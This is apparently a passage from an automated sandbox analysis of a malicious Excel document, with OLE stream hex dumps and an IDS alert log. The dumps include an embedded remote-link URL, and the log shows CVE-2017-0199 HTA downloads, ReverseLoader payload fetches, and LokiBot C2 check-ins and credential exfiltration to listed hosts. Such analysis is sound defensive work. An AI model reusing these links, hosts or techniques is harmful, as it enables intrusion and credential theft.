                                                                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e2 9b 29 3b aa 01 00 00 e0 07 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Stream Path: MBD00CFD365/MBD00032715/\x1CompObj, File Type: data, Stream Size: 99
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD00032715/\x1CompObj
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:99
                                                                                                    Entropy:3.631242196770981
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Stream Path: MBD00CFD365/MBD00032715/Package, File Type: Microsoft Excel 2007+, Stream Size: 38341
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD00032715/Package
                                                                                                    CLSID:
                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                    Stream Size:38341
                                                                                                    Entropy:7.85773182578822
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Stream Path: MBD00CFD365/MBD00032B6D/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD00032B6D/\x1CompObj
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:114
                                                                                                    Entropy:4.25248375192737
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Stream Path: MBD00CFD365/MBD00032B6D/\x5DocumentSummaryInformation, File Type: data, Stream Size: 484
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD00032B6D/\x5DocumentSummaryInformation
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:484
                                                                                                    Entropy:3.922883556049869
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00
                                                                                                    Stream Path: MBD00CFD365/MBD00032B6D/\x5SummaryInformation, File Type: data, Stream Size: 19956
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD00032B6D/\x5SummaryInformation
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:19956
                                                                                                    Entropy:3.047871976270467
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . . . . % . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . | & . . . . . . . . . . . . . . & . . . " W M F C . . . .
                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 4d 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                    Stream Path: MBD00CFD365/MBD00032B6D/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 95624
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD00032B6D/Workbook
                                                                                                    CLSID:
                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                    Stream Size:95624
                                                                                                    Entropy:3.890268972586762
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q | 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
                                                                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                    Stream Path: MBD00CFD365/MBD00033186/\x1CompObj, File Type: data, Stream Size: 114
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD00033186/\x1CompObj
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:114
                                                                                                    Entropy:4.219515110876372
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Stream Path: MBD00CFD365/MBD00033186/Package, File Type: Microsoft Excel 2007+, Stream Size: 52190
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD00033186/Package
                                                                                                    CLSID:
                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                    Stream Size:52190
                                                                                                    Entropy:7.870757596146126
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Stream Path: MBD00CFD365/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD0018D4CE/\x1Ole
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:20
                                                                                                    Entropy:0.5689955935892812
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Stream Path: MBD00CFD365/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD0018D4CE/\x3ObjInfo
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:4
                                                                                                    Entropy:0.8112781244591328
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . .
                                                                                                    Data Raw:00 00 03 00
                                                                                                    Stream Path: MBD00CFD365/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/MBD0018D4CE/Contents
                                                                                                    CLSID:
                                                                                                    File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                    Stream Size:197671
                                                                                                    Entropy:6.989042939766534
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Stream Path: MBD00CFD365/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 212905
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD365/Workbook
                                                                                                    CLSID:
                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                    Stream Size:212905
                                                                                                    Entropy:7.612848324441619
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                    Stream Path: MBD00CFD366/\x1Ole, File Type: data, Stream Size: 992
                                                                                                    General
                                                                                                    Stream Path:MBD00CFD366/\x1Ole
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:992
                                                                                                    Entropy:5.514159324515482
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . M e v . . . . . . . . . . . . @ . . . y . . . K . < . . . h . t . t . p . s . : . / . / . a . c . e . s . s . o . . . r . u . n . / . j . 2 . A . m . N . 9 . ? . & . c . a . m . e . o . = . m . i . s . t . y . & . c . h . a . d . o . r . = . o . r . a . n . g . e . & . a . l . t . o . = . d . a . r . k . & . c . l . o . a . k . = . d . o . m . i . n . e . e . r . i . n . g . & . e . f . f . i . c . a . c . y . = . d . e . e . p . l . y . & . p . r . i . d . e . = . g . r . o . u . c . h . y . & . a
                                                                                                    Data Raw:01 00 00 02 4d f0 8d 65 b7 a5 85 76 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 3c 02 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 61 00 63 00 65 00 73 00 73 00 6f 00 2e 00 72 00 75 00 6e 00 2f 00 6a 00 32 00 41 00 6d 00 4e 00 39 00 3f 00 26 00 63 00 61 00 6d 00 65 00 6f 00 3d 00 6d 00 69 00 73 00 74 00 79 00 26 00 63 00
                                                                                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 312292
                                                                                                    General
                                                                                                    Stream Path:Workbook
                                                                                                    CLSID:
                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                    Stream Size:312292
                                                                                                    Entropy:7.998576781689245
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . S ( o . y . . 9 . u \\ u z x E n W . . . . . . . . . . . \\ . p . i . g Z . U . T O f L . . . c 6 J $ K . . } L " * . = . n . U B 9 _ s . e . . , t J h V . , A Z 7 U 4 . I B . . . a . . . . . . = . . . " ^ / o * . . . V _ . . 2 F . . . . % . . . . y . . . . . . . . . . % . . . O . . . . = . . . | U g u z g ; / ) @ . . . L v . . . W " . . . . . . . . . 1 . . . . . . I 1 . . . q h . . . 4 f c z x . Z . A : 1 . . . M @ e p . . 8 T d P . t . . | 1 . . . K
                                                                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 d3 8e a4 b4 b3 d0 53 e5 cc e6 28 6f a7 20 9e 08 79 c1 ca a9 fc d0 c1 04 e7 f2 a9 f8 39 00 75 94 d7 5c 75 b1 7a cb 78 a2 45 83 6e a1 bd 88 a7 57 e1 00 02 00 b0 04 c1 00 02 00 cb 95 e2 00 00 00 5c 00 70 00 9a ec 8c 69 01 a8 67 5a 0d f8 55 e6 8a 9f bb aa f6 b4 54 da 4f aa 9f eb f9 b1 9a 66 4c 0b
                                                                                                    Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                                                                                                    General
                                                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                    CLSID:
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Stream Size:527
                                                                                                    Entropy:5.250418223044589
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:I D = " { 3 4 1 D 9 B B 8 - 3 8 6 0 - 4 B 5 3 - 9 2 6 1 - 7 3 B 6 A 4 D A 9 5 3 C } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A A A 8 1 4 1 2 8 C 1 6 8 C 1 6 8
                                                                                                    Data Raw:49 44 3d 22 7b 33 34 31 44 39 42 42 38 2d 33 38 36 30 2d 34 42 35 33 2d 39 32 36 31 2d 37 33 42 36 41 34 44 41 39 35 33 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                    Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                                    General
                                                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:104
                                                                                                    Entropy:3.0488640812019017
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                    Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                                                    General
                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:2644
                                                                                                    Entropy:3.980379020997841
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                    Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                                                                    General
                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                    CLSID:
                                                                                                    File Type:data
                                                                                                    Stream Size:553
                                                                                                    Entropy:6.353528014236898
                                                                                                    Base64 Encoded:True
                                                                                                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . 2 i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                                                    Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 da bc 32 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                    Network Behavior

                                                                                                    Suricata IDS Alerts

                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-10-29T10:12:28.076357+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1198.46.178.15580192.168.2.2249177TCP
                                                                                                    2024-10-29T10:12:28.076357+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922094.156.177.22080TCP
                                                                                                    2024-10-29T10:12:28.076357+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922094.156.177.22080TCP
                                                                                                    2024-10-29T10:12:28.076357+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922094.156.177.22080TCP
                                                                                                    2024-10-29T10:12:28.076357+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922094.156.177.22080TCP
                                                                                                    2024-10-29T10:12:28.076357+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922094.156.177.22080TCP
                                                                                                    2024-10-29T10:12:30.268715+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164198.46.178.15580TCP
                                                                                                    2024-10-29T10:12:30.268769+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1198.46.178.15580192.168.2.2249164TCP
                                                                                                    2024-10-29T10:12:33.244607+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166198.46.178.15580TCP
                                                                                                    2024-10-29T10:12:33.244629+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1198.46.178.15580192.168.2.2249166TCP
                                                                                                    2024-10-29T10:12:40.794398+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249167198.46.178.15580TCP
                                                                                                    2024-10-29T10:12:51.989536+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249174198.46.178.15580TCP
                                                                                                    2024-10-29T10:13:13.410137+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.250.185.97443192.168.2.2249176TCP
                                                                                                    2024-10-29T10:13:14.186300+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.250.185.97443192.168.2.2249173TCP
                                                                                                    2024-10-29T10:13:29.856264+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:29.856264+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:29.856264+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:30.820927+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224917994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:30.955412+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:30.955412+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:30.955412+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:31.936132+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224918094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:31.998506+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:31.998506+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:31.998506+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:32.965512+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:32.965512+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:32.971704+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249181TCP
                                                                                                    2024-10-29T10:13:33.108548+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:33.108548+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:33.108548+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:34.088596+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:34.088596+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:34.094708+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249182TCP
                                                                                                    2024-10-29T10:13:34.231392+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918394.156.177.22080TCP
                                                                                                    2024-10-29T10:13:34.231392+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918394.156.177.22080TCP
